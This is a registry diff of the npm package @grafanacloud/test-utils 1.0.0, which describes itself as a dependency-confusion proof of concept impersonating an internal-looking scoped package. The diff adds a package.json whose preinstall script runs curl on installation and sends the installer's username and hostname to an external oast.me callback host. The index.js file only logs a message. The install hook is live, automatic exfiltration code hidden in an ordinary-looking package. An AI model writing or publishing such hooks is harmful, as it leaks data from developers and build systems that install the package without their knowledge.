@grafanacloud/test-utils 1.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/index.js +1 -0
- package/package.json +11 -0
package/index.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
console.log('Dependency Confusion PoC');
|
package/package.json
ADDED
|
@@ -0,0 +1,11 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "@grafanacloud/test-utils",
|
|
3
|
+
"version": "1.0.0",
|
|
4
|
+
"description": "PoC for dependency confusion via typo-squatting",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"preinstall": "curl -G http://d228g611og881m0bmkdgdfhrapk69fzys.oast.me --data-urlencode whoami=$(whoami) --data-urlencode host=$(hostname)"
|
|
8
|
+
},
|
|
9
|
+
"author": "himanshu",
|
|
10
|
+
"license": "ISC"
|
|
11
|
+
}
|